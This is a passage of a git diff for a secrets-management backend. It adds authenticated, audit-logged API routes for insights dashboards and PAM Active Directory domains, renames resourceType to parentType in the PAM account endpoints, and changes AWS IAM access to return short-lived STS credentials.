z.array(z.object({ method: z.string(), count: z.number() })) + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId, days } = req.query; + const result = await server.services.insights.getAuthMethodDistribution({ 
projectId, days }, req.permission); + await server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_AUTH_METHODS, metadata: { projectId, days } }, + ...req.auditLogInfo + }); + return result; + } + }); + + server.route({ + method: "GET", + url: "/secrets/summary", + config: { rateLimit: readLimit }, + schema: { + operationId: "getInsightsSummary", + description: + "Get summary stats for the insights dashboard: upcoming rotations, upcoming reminders, and stale secrets", + security: [{ bearerAuth: [] }], + querystring: z.object({ + projectId: z.string().trim(), + staleSecretsOffset: z.coerce.number().min(0).max(10000).default(0), + staleSecretsLimit: z.coerce.number().min(1).max(100).default(50) + }), + response: { + 200: z.object({ + upcomingRotations: z.array( + z.object({ + name: z.string(), + environment: z.string(), + secretPath: z.string(), + nextRotationAt: z.date().nullable(), + rotationStatus: z.string().nullable() + }) + ), + failedRotations: z.array( + z.object({ + name: z.string(), + environment: z.string(), + secretPath: z.string(), + nextRotationAt: z.date().nullable(), + rotationStatus: z.string().nullable() + }) + ), + upcomingReminders: z.array( + z.object({ + secretKey: z.string(), + environment: z.string(), + secretPath: z.string(), + nextReminderDate: z.date() + }) + ), + overdueReminders: z.array( + z.object({ + secretKey: z.string(), + environment: z.string(), + secretPath: z.string(), + nextReminderDate: z.date() + }) + ), + staleSecrets: z.array( + z.object({ key: z.string(), environment: z.string(), secretPath: z.string(), updatedAt: z.date() }) + ), + totalStaleCount: z.number() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + const { projectId, staleSecretsOffset, staleSecretsLimit } = req.query; + const result = await server.services.insights.getSummary( + { projectId, staleSecretsOffset, staleSecretsLimit }, + req.permission + ); + await 
server.services.auditLog.createAuditLog({ + projectId, + event: { type: EventType.VIEW_INSIGHTS_SECRETS_MANAGEMENT_SUMMARY, metadata: { projectId } }, + ...req.auditLogInfo + }); + return result; + } + }); +}; diff --git a/backend/src/ee/routes/v1/pam-account-routers/index.ts b/backend/src/ee/routes/v1/pam-account-routers/index.ts index 3f9eb4e1f45..d421df50a0c 100644 --- a/backend/src/ee/routes/v1/pam-account-routers/index.ts +++ b/backend/src/ee/routes/v1/pam-account-routers/index.ts @@ -1,8 +1,3 @@ -import { - CreateActiveDirectoryAccountSchema, - SanitizedActiveDirectoryAccountWithResourceSchema, - UpdateActiveDirectoryAccountSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; import { CreateAwsIamAccountSchema, SanitizedAwsIamAccountWithResourceSchema, @@ -56,7 +51,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Postgres, + parentType: PamResource.Postgres, accountResponseSchema: SanitizedPostgresAccountWithResourceSchema, createAccountSchema: CreatePostgresAccountSchema, updateAccountSchema: UpdatePostgresAccountSchema @@ -65,7 +60,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.MySQL, + parentType: PamResource.MySQL, accountResponseSchema: SanitizedMySQLAccountWithResourceSchema, createAccountSchema: CreateMySQLAccountSchema, updateAccountSchema: UpdateMySQLAccountSchema @@ -74,7 +69,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.MsSQL, + parentType: PamResource.MsSQL, accountResponseSchema: SanitizedMsSQLAccountWithResourceSchema, createAccountSchema: CreateMsSQLAccountSchema, updateAccountSchema: UpdateMsSQLAccountSchema @@ -83,7 +78,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Redis, + parentType: 
PamResource.Redis, accountResponseSchema: SanitizedRedisAccountWithResourceSchema, createAccountSchema: CreateRedisAccountSchema, updateAccountSchema: UpdateRedisAccountSchema @@ -92,7 +87,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.MongoDB, + parentType: PamResource.MongoDB, accountResponseSchema: SanitizedMongoDBAccountWithResourceSchema, createAccountSchema: CreateMongoDBAccountSchema, updateAccountSchema: UpdateMongoDBAccountSchema @@ -101,7 +96,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.SSH, + parentType: PamResource.SSH, accountResponseSchema: SanitizedSSHAccountWithResourceSchema, createAccountSchema: CreateSSHAccountSchema, updateAccountSchema: UpdateSSHAccountSchema @@ -110,7 +105,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Kubernetes, + parentType: PamResource.Kubernetes, accountResponseSchema: SanitizedKubernetesAccountWithResourceSchema, createAccountSchema: CreateKubernetesAccountSchema, updateAccountSchema: UpdateKubernetesAccountSchema @@ -119,7 +114,7 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.AwsIam, + parentType: PamResource.AwsIam, accountResponseSchema: SanitizedAwsIamAccountWithResourceSchema, createAccountSchema: CreateAwsIamAccountSchema, updateAccountSchema: UpdateAwsIamAccountSchema @@ -128,19 +123,10 @@ export const PAM_ACCOUNT_REGISTER_ROUTER_MAP: Record { registerPamAccountEndpoints({ server, - resourceType: PamResource.Windows, + parentType: PamResource.Windows, accountResponseSchema: SanitizedWindowsAccountWithResourceSchema, createAccountSchema: CreateWindowsAccountSchema, updateAccountSchema: UpdateWindowsAccountSchema }); - }, - [PamResource.ActiveDirectory]: async (server: FastifyZodProvider) => { - 
registerPamAccountEndpoints({ - server, - resourceType: PamResource.ActiveDirectory, - accountResponseSchema: SanitizedActiveDirectoryAccountWithResourceSchema, - createAccountSchema: CreateActiveDirectoryAccountSchema, - updateAccountSchema: UpdateActiveDirectoryAccountSchema - }); } }; diff --git a/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts b/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts index b78ae1a9418..2b444685f4e 100644 --- a/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts +++ b/backend/src/ee/routes/v1/pam-account-routers/pam-account-endpoints.ts @@ -1,7 +1,7 @@ import { z } from "zod"; import { EventType } from "@app/ee/services/audit-log/audit-log-types"; -import { PamResource } from "@app/ee/services/pam-resource/pam-resource-enums"; +import { PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; import { TPamAccount } from "@app/ee/services/pam-resource/pam-resource-types"; import { writeLimit } from "@app/server/config/rateLimiter"; import { getTelemetryDistinctId } from "@app/server/lib/telemetry"; @@ -12,16 +12,17 @@ import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; export const registerPamAccountEndpoints = ({ server, - resourceType, + parentType, createAccountSchema, updateAccountSchema, accountResponseSchema }: { server: FastifyZodProvider; - resourceType: PamResource; + parentType: PamParentType; createAccountSchema: z.ZodType<{ credentials: C["credentials"]; - resourceId: C["resourceId"]; + resourceId?: C["resourceId"]; + domainId?: C["domainId"]; folderId?: C["folderId"]; name: C["name"]; description?: C["description"]; @@ -41,9 +42,9 @@ export const registerPamAccountEndpoints = ({ }>; accountResponseSchema: z.ZodTypeAny; }) => { - // Convert resource type enum value to PascalCase for operation IDs + // Convert parent type enum value to PascalCase for operation IDs // e.g., "postgres" -> "Postgres", "aws-iam" -> "AwsIam" - const 
resourceTypeId = resourceType + const parentTypeId = parentType .split("-") .map((word) => word.charAt(0).toUpperCase() + word.slice(1)) .join(""); @@ -55,7 +56,7 @@ export const registerPamAccountEndpoints = ({ rateLimit: writeLimit }, schema: { - operationId: `create${resourceTypeId}PamAccount`, + operationId: `create${parentTypeId}PamAccount`, description: "Create PAM account", body: createAccountSchema, response: { @@ -66,7 +67,14 @@ export const registerPamAccountEndpoints = ({ }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const account = await server.services.pamAccount.create(req.body, req.permission); + const account = await server.services.pamAccount.create( + { + ...req.body, + resourceId: req.body.resourceId ?? undefined, + domainId: req.body.domainId ?? undefined + }, + req.permission + ); await server.services.auditLog.createAuditLog({ ...req.auditLogInfo, @@ -76,7 +84,8 @@ export const registerPamAccountEndpoints = ({ type: EventType.PAM_ACCOUNT_CREATE, metadata: { resourceId: req.body.resourceId, - resourceType, + domainId: req.body.domainId, + parentType, folderId: req.body.folderId, name: req.body.name, description: req.body.description, @@ -91,7 +100,7 @@ export const registerPamAccountEndpoints = ({ distinctId: getTelemetryDistinctId(req), organizationId: req.permission.orgId, properties: { - resourceType, + parentType, projectId: account.projectId } }) @@ -108,7 +117,7 @@ export const registerPamAccountEndpoints = ({ rateLimit: writeLimit }, schema: { - operationId: `update${resourceTypeId}PamAccount`, + operationId: `update${parentTypeId}PamAccount`, description: "Update PAM account", params: z.object({ accountId: z.string().uuid() @@ -139,7 +148,8 @@ export const registerPamAccountEndpoints = ({ metadata: { accountId: req.params.accountId, resourceId: account.resourceId, - resourceType, + domainId: account.domainId, + parentType, name: req.body.name, description: req.body.description, requireMfa: req.body.requireMfa @@ 
-158,7 +168,7 @@ export const registerPamAccountEndpoints = ({ rateLimit: writeLimit }, schema: { - operationId: `delete${resourceTypeId}PamAccount`, + operationId: `delete${parentTypeId}PamAccount`, description: "Delete PAM account", params: z.object({ accountId: z.string().uuid() @@ -183,7 +193,8 @@ export const registerPamAccountEndpoints = ({ accountId: req.params.accountId, accountName: account.name, resourceId: account.resourceId, - resourceType + domainId: account.domainId, + parentType } } }); @@ -194,7 +205,7 @@ export const registerPamAccountEndpoints = ({ distinctId: getTelemetryDistinctId(req), organizationId: req.permission.orgId, properties: { - resourceType, + parentType, projectId: account.projectId } }) diff --git a/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts b/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts index 2e4275c5504..d39ff1890b5 100644 --- a/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts +++ b/backend/src/ee/routes/v1/pam-account-routers/pam-account-router.ts @@ -1,13 +1,14 @@ import type WebSocket from "ws"; import { z } from "zod"; -import { PamAccountDependenciesSchema } from "@app/db/schemas"; +import { PamAccountDependenciesSchema, PamDomainsSchema, PamResourcesSchema } from "@app/db/schemas"; import { AuditLogInfo, EventType, UserAgentType } from "@app/ee/services/audit-log/audit-log-types"; -import { PamAccountOrderBy, PamAccountView } from "@app/ee/services/pam-account/pam-account-enums"; +import { PamAccountOrderBy, PamAccountView, PamParentType } from "@app/ee/services/pam-account/pam-account-enums"; import { ActiveDirectoryAccountCredentialsSchema, - SanitizedActiveDirectoryAccountWithResourceSchema -} from "@app/ee/services/pam-resource/active-directory/active-directory-resource-schemas"; + SanitizedActiveDirectoryAccountWithDomainSchema +} from "@app/ee/services/pam-domain/active-directory/active-directory-domain-schemas"; +import { PamDomainType } from 
"@app/ee/services/pam-domain/pam-domain-enums"; import { AwsIamAccountCredentialsSchema, SanitizedAwsIamAccountWithResourceSchema @@ -58,7 +59,7 @@ import { TokenType } from "@app/services/auth-token/auth-token-types"; import { PostHogEventTypes } from "@app/services/telemetry/telemetry-types"; const SanitizedAccountSchema = z - .discriminatedUnion("resourceType", [ + .discriminatedUnion("parentType", [ SanitizedKubernetesAccountWithResourceSchema, SanitizedSSHAccountWithResourceSchema, SanitizedPostgresAccountWithResourceSchema, @@ -68,7 +69,7 @@ const SanitizedAccountSchema = z SanitizedRedisAccountWithResourceSchema, SanitizedAwsIamAccountWithResourceSchema, SanitizedWindowsAccountWithResourceSchema, - SanitizedActiveDirectoryAccountWithResourceSchema + SanitizedActiveDirectoryAccountWithDomainSchema ]) .and( z.object({ @@ -85,49 +86,50 @@ const ListPamAccountsResponseSchema = z.object({ const AccountCredentialsBaseSchema = z.object({ accountId: z.string().uuid(), accountName: z.string(), - resourceName: z.string(), - projectId: z.string().uuid() + projectId: z.string().uuid(), + resource: PamResourcesSchema.pick({ id: true, name: true, resourceType: true }).nullable().optional(), + domain: PamDomainsSchema.pick({ id: true, name: true, domainType: true }).nullable().optional() }); -const AccountCredentialsResponseSchema = z.discriminatedUnion("resourceType", [ +const AccountCredentialsResponseSchema = z.discriminatedUnion("parentType", [ AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Postgres), + parentType: z.literal(PamResource.Postgres), credentials: PostgresAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.MySQL), + parentType: z.literal(PamResource.MySQL), credentials: MySQLAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.MsSQL), + parentType: z.literal(PamResource.MsSQL), credentials: MsSQLAccountCredentialsSchema }), 
AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.MongoDB), + parentType: z.literal(PamResource.MongoDB), credentials: MongoDBAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.SSH), - credentials: SSHAccountCredentialsSchema + parentType: z.literal(PamResource.Redis), + credentials: RedisAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Redis), - credentials: RedisAccountCredentialsSchema + parentType: z.literal(PamResource.SSH), + credentials: SSHAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Kubernetes), + parentType: z.literal(PamResource.Kubernetes), credentials: KubernetesAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.AwsIam), + parentType: z.literal(PamResource.AwsIam), credentials: AwsIamAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.Windows), + parentType: z.literal(PamResource.Windows), credentials: WindowsAccountCredentialsSchema }), AccountCredentialsBaseSchema.extend({ - resourceType: z.literal(PamResource.ActiveDirectory), + parentType: z.literal(PamDomainType.ActiveDirectory), credentials: ActiveDirectoryAccountCredentialsSchema }) ]); @@ -267,7 +269,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { distinctId: getTelemetryDistinctId(req), organizationId: req.permission.orgId, properties: { - resourceType: account.resourceType, + parentType: account.parentType as PamParentType, projectId: account.projectId } }) @@ -359,8 +361,10 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { metadata: { accountId: result.accountId, accountName: result.accountName, - resourceId: result.resourceId, - resourceType: result.resourceType + resourceId: result.resource?.id, + resourceType: 
result.resource?.resourceType, + domainId: result.domain?.id, + domainType: result.domain?.domainType } } }); @@ -451,6 +455,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { orderDirection: z.nativeEnum(OrderByDirection).default(OrderByDirection.ASC), search: z.string().trim().optional(), filterResourceIds: z.array(z.string().uuid()).optional(), + filterDomainIds: z.array(z.string().uuid()).optional(), metadata: z .array( z.object({ @@ -466,8 +471,18 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { }, onRequest: verifyAuth([AuthMode.JWT]), handler: async (req) => { - const { projectId, accountView, limit, offset, search, orderBy, orderDirection, filterResourceIds, metadata } = - req.body; + const { + projectId, + accountView, + limit, + offset, + search, + orderBy, + orderDirection, + filterResourceIds, + filterDomainIds, + metadata + } = req.body; const { accounts, totalCount } = await server.services.pamAccount.list({ actorId: req.permission.id, @@ -482,6 +497,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { orderBy, orderDirection, filterResourceIds, + filterDomainIds, metadataFilter: metadata }); @@ -514,6 +530,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountName: z.string().trim(), projectId: z.string().uuid(), mfaSessionId: z.string().optional(), + reason: z.string().trim().max(1000).optional(), duration: z .string() .min(1) @@ -540,11 +557,14 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { GatewayAccessResponseSchema.extend({ resourceType: z.literal(PamResource.Redis) }), GatewayAccessResponseSchema.extend({ resourceType: z.literal(PamResource.SSH) }), GatewayAccessResponseSchema.extend({ resourceType: z.literal(PamResource.Kubernetes) }), - // AWS IAM (no gateway, returns console URL) + // AWS IAM (no gateway, returns short-lived STS credentials usable by both CLI and 
console) z.object({ sessionId: z.string(), resourceType: z.literal(PamResource.AwsIam), - consoleUrl: z.string().url(), + accessKeyId: z.string(), + secretAccessKey: z.string(), + sessionToken: z.string(), + expiresAt: z.string(), metadata: z.record(z.string(), z.string().optional()).optional() }) ]) @@ -567,7 +587,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountName: req.body.accountName, projectId: req.body.projectId, duration: req.body.duration, - mfaSessionId: req.body.mfaSessionId + mfaSessionId: req.body.mfaSessionId, + reason: req.body.reason }, req.permission ); @@ -582,7 +603,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountId: response.account.id, resourceName: req.body.resourceName, accountName: response.account.name, - duration: req.body.duration ? new Date(req.body.duration).toISOString() : undefined + duration: req.body.duration ? new Date(req.body.duration).toISOString() : undefined, + reason: req.body.reason } } }); @@ -604,6 +626,66 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { } }); + // Mint an AWS Console federated sign-in URL from an existing AWS IAM session + server.route({ + method: "POST", + url: "/sessions/:sessionId/aws-console-url", + config: { + rateLimit: writeLimit + }, + schema: { + description: "Generate an AWS console sign-in URL for an existing PAM session", + params: z.object({ + sessionId: z.string().uuid() + }), + body: z.object({ + projectId: z.string().uuid(), + accessKeyId: z.string().min(1), + secretAccessKey: z.string().min(1), + sessionToken: z.string().min(1) + }), + response: { + 200: z.object({ + consoleUrl: z.string().url() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT]), + handler: async (req) => { + if (req.auth.authMode !== AuthMode.JWT) { + throw new BadRequestError({ message: "You can only access PAM accounts using JWT auth tokens." 
}); + } + + const result = await server.services.pamAccount.getAwsIamConsoleUrl( + { + sessionId: req.params.sessionId, + projectId: req.body.projectId, + accessKeyId: req.body.accessKeyId, + secretAccessKey: req.body.secretAccessKey, + sessionToken: req.body.sessionToken + }, + req.permission + ); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: req.body.projectId, + event: { + type: EventType.PAM_ACCOUNT_AWS_CONSOLE_URL_GENERATED, + metadata: { + sessionId: req.params.sessionId, + accountId: result.accountId ?? "", + resourceName: result.resourceName, + accountName: result.accountName + } + } + }); + + return { consoleUrl: result.consoleUrl }; + } + }); + // Web access ticket endpoint server.route({ method: "POST", @@ -618,7 +700,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { }), body: z.object({ projectId: z.string().uuid(), - mfaSessionId: z.string().optional() + mfaSessionId: z.string().optional(), + reason: z.string().trim().max(1000).optional() }), response: { 200: z.object({ ticket: z.string() }) @@ -639,7 +722,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { actorEmail: req.auth.user.email ?? "", actorName: `${req.auth.user.firstName ?? ""} ${req.auth.user.lastName ?? 
""}`.trim(), auditLogInfo: req.auditLogInfo, - mfaSessionId: req.body.mfaSessionId + mfaSessionId: req.body.mfaSessionId, + reason: req.body.reason }); await server.services.telemetry @@ -708,6 +792,7 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { accountName: z.string(), actorEmail: z.string(), actorName: z.string(), + reason: z.string().nullable().optional(), auditLogInfo: z.object({ ipAddress: z.string().optional(), userAgent: z.string().optional(), @@ -737,7 +822,8 @@ export const registerPamAccountRouter = async (server: FastifyZodProvider) => { auditLogInfo: payload.auditLogInfo as AuditLogInfo, userId, actorIp: req.realIp ?? "", - actorUserAgent: req.headers["user-agent"] ?? "" + actorUserAgent: req.headers["user-agent"] ?? "", + reason: payload.reason }); } catch (err) { logger.error(err, "WebSocket ticket validation failed"); diff --git a/backend/src/ee/routes/v1/pam-domain-routers/index.ts b/backend/src/ee/routes/v1/pam-domain-routers/index.ts new file mode 100644 index 00000000000..ab5f2eb4323 --- /dev/null +++ b/backend/src/ee/routes/v1/pam-domain-routers/index.ts @@ -0,0 +1,44 @@ +import { registerPamAccountEndpoints } from "@app/ee/routes/v1/pam-account-routers/pam-account-endpoints"; +import { + CreateActiveDirectoryAccountSchema, + SanitizedActiveDirectoryAccountWithDomainSchema, + UpdateActiveDirectoryAccountSchema +} from "@app/ee/services/pam-domain/active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { + CreateActiveDirectoryDomainSchema, + SanitizedActiveDirectoryDomainSchema, + UpdateActiveDirectoryDomainSchema +} from "@app/ee/services/pam-domain/pam-domain-schemas"; + +import { registerActiveDirectoryRelatedResourcesEndpoint, registerPamDomainEndpoints } from "./pam-domain-endpoints"; + +export { registerPamDomainRouter } from "./pam-domain-router"; + +export const PAM_DOMAIN_REGISTER_ROUTER_MAP: Record Promise> = { + 
[PamDomainType.ActiveDirectory]: async (server: FastifyZodProvider) => { + registerPamDomainEndpoints({ + server, + domainType: PamDomainType.ActiveDirectory, + domainResponseSchema: SanitizedActiveDirectoryDomainSchema, + createDomainSchema: CreateActiveDirectoryDomainSchema, + updateDomainSchema: UpdateActiveDirectoryDomainSchema + }); + registerActiveDirectoryRelatedResourcesEndpoint(server); + } +}; + +export const PAM_DOMAIN_ACCOUNT_REGISTER_ROUTER_MAP: Record< + PamDomainType, + (server: FastifyZodProvider) => Promise<void> +> = { + [PamDomainType.ActiveDirectory]: async (server: FastifyZodProvider) => { + registerPamAccountEndpoints({ + server, + parentType: PamDomainType.ActiveDirectory, + accountResponseSchema: SanitizedActiveDirectoryAccountWithDomainSchema, + createAccountSchema: CreateActiveDirectoryAccountSchema, + updateAccountSchema: UpdateActiveDirectoryAccountSchema + }); + } +}; diff --git a/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-endpoints.ts b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-endpoints.ts new file mode 100644 index 00000000000..54b6fbb61ce --- /dev/null +++ b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-endpoints.ts @@ -0,0 +1,220 @@ +import { z } from "zod"; + +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { TPamDomain } from "@app/ee/services/pam-domain/pam-domain-types"; +import { SanitizedWindowsResourceSchema } from "@app/ee/services/pam-resource/windows-server/windows-server-resource-schemas"; +import { readLimit, writeLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; +import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; + +export const registerPamDomainEndpoints = <T extends TPamDomain>({ + server, + domainType, + 
createDomainSchema, + updateDomainSchema, + domainResponseSchema +}: { + server: FastifyZodProvider; + domainType: PamDomainType; + createDomainSchema: z.ZodType<{ + projectId: T["projectId"]; + connectionDetails: T["connectionDetails"]; + gatewayId?: string; + name: T["name"]; + metadata?: z.input<typeof ResourceMetadataNonEncryptionSchema>; + }>; + updateDomainSchema: z.ZodType<{ + connectionDetails?: T["connectionDetails"]; + gatewayId?: string; + name?: T["name"]; + metadata?: z.input<typeof ResourceMetadataNonEncryptionSchema>; + }>; + domainResponseSchema: z.ZodTypeAny; +}) => { + const domainTypeId = domainType + .split("-") + .map((word) => word.charAt(0).toUpperCase() + word.slice(1)) + .join(""); + + server.route({ + method: "GET", + url: "/:domainId", + config: { rateLimit: readLimit }, + schema: { + operationId: `get${domainTypeId}PamDomain`, + description: `Get ${domainTypeId} PAM domain`, + params: z.object({ domainId: z.string().uuid() }), + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.getById(req.params.domainId, domainType, req.permission); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: domain.projectId, + event: { + type: EventType.PAM_DOMAIN_GET, + metadata: { + domainId: domain.id, + domainType: domain.domainType, + name: domain.name + } + } + }); + + return { domain }; + } + }); + + server.route({ + method: "POST", + url: "/", + config: { rateLimit: writeLimit }, + schema: { + operationId: `create${domainTypeId}PamDomain`, + description: `Create ${domainTypeId} PAM domain`, + body: createDomainSchema, + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.create( + { + ...req.body, + domainType + }, + 
req.permission + ); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: req.body.projectId, + event: { + type: EventType.PAM_DOMAIN_CREATE, + metadata: { + domainType, + ...(req.body.gatewayId && { gatewayId: req.body.gatewayId }), + name: req.body.name + } + } + }); + + return { domain }; + } + }); + + server.route({ + method: "PATCH", + url: "/:domainId", + config: { rateLimit: writeLimit }, + schema: { + operationId: `update${domainTypeId}PamDomain`, + description: `Update ${domainTypeId} PAM domain`, + params: z.object({ domainId: z.string().uuid() }), + body: updateDomainSchema, + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.updateById( + { + ...req.body, + domainId: req.params.domainId + }, + req.permission + ); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + orgId: req.permission.orgId, + projectId: domain.projectId, + event: { + type: EventType.PAM_DOMAIN_UPDATE, + metadata: { + domainId: req.params.domainId, + domainType, + ...(req.body.gatewayId && { gatewayId: req.body.gatewayId }), + ...(req.body.name && { name: req.body.name }) + } + } + }); + + return { domain }; + } + }); + + server.route({ + method: "DELETE", + url: "/:domainId", + config: { rateLimit: writeLimit }, + schema: { + operationId: `delete${domainTypeId}PamDomain`, + description: `Delete ${domainTypeId} PAM domain`, + params: z.object({ domainId: z.string().uuid() }), + response: { + 200: z.object({ + domain: domainResponseSchema + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const domain = await server.services.pamDomain.deleteById(req.params.domainId, req.permission); + + await server.services.auditLog.createAuditLog({ + ...req.auditLogInfo, + 
orgId: req.permission.orgId, + projectId: domain.projectId, + event: { + type: EventType.PAM_DOMAIN_DELETE, + metadata: { + domainId: req.params.domainId, + domainType + } + } + }); + + return { domain }; + } + }); +}; + +export const registerActiveDirectoryRelatedResourcesEndpoint = (server: FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/:domainId/related-resources", + config: { rateLimit: readLimit }, + schema: { + operationId: "listActiveDirectoryDomainRelatedResources", + description: "List resources related to an Active Directory domain", + params: z.object({ domainId: z.string().uuid() }), + response: { + 200: z.object({ + resources: SanitizedWindowsResourceSchema.array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const resources = await server.services.pamDomain.listRelatedResources(req.params.domainId, req.permission); + return { resources }; + } + }); +}; diff --git a/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-router.ts b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-router.ts new file mode 100644 index 00000000000..f88eb9fc09a --- /dev/null +++ b/backend/src/ee/routes/v1/pam-domain-routers/pam-domain-router.ts @@ -0,0 +1,108 @@ +import { z } from "zod"; + +import { EventType } from "@app/ee/services/audit-log/audit-log-types"; +import { PamDomainOrderBy } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { + ActiveDirectoryDomainListItemSchema, + SanitizedDomainSchema +} from "@app/ee/services/pam-domain/pam-domain-schemas"; +import { OrderByDirection } from "@app/lib/types"; +import { readLimit } from "@app/server/config/rateLimiter"; +import { verifyAuth } from "@app/server/plugins/auth/verify-auth"; +import { AuthMode } from "@app/services/auth/auth-type"; + +const DomainOptionsSchema = z.discriminatedUnion("domain", [ActiveDirectoryDomainListItemSchema]); + +export const registerPamDomainRouter = async (server: 
FastifyZodProvider) => { + server.route({ + method: "GET", + url: "/options", + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listPamDomainOptions", + description: "List available PAM domain types", + response: { + 200: z.object({ + options: DomainOptionsSchema.array() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: () => { + const options = server.services.pamDomain.listDomainOptions(); + return { options }; + } + }); + + server.route({ + method: "GET", + url: "/", + config: { + rateLimit: readLimit + }, + schema: { + operationId: "listPamDomains", + description: "List PAM domains", + querystring: z.object({ + projectId: z.string().uuid(), + search: z.string().optional(), + limit: z.coerce.number().int().min(1).max(100).optional(), + offset: z.coerce.number().int().min(0).optional(), + orderBy: z.nativeEnum(PamDomainOrderBy).default(PamDomainOrderBy.Name), + orderDirection: z.nativeEnum(OrderByDirection).default(OrderByDirection.ASC), + filterDomainTypes: z + .string() + .transform((val) => + val + .split(",") + .map((s) => s.trim()) + .filter(Boolean) + ) + .optional(), + discoveryFingerprint: z.string().optional() + }), + response: { + 200: z.object({ + domains: SanitizedDomainSchema.array(), + totalCount: z.number() + }) + } + }, + onRequest: verifyAuth([AuthMode.JWT, AuthMode.IDENTITY_ACCESS_TOKEN]), + handler: async (req) => { + const { projectId, search, limit, offset, orderBy, orderDirection, filterDomainTypes, discoveryFingerprint } = + req.query; + + const { domains, totalCount } = await server.services.pamDomain.list({ + projectId, + search, + 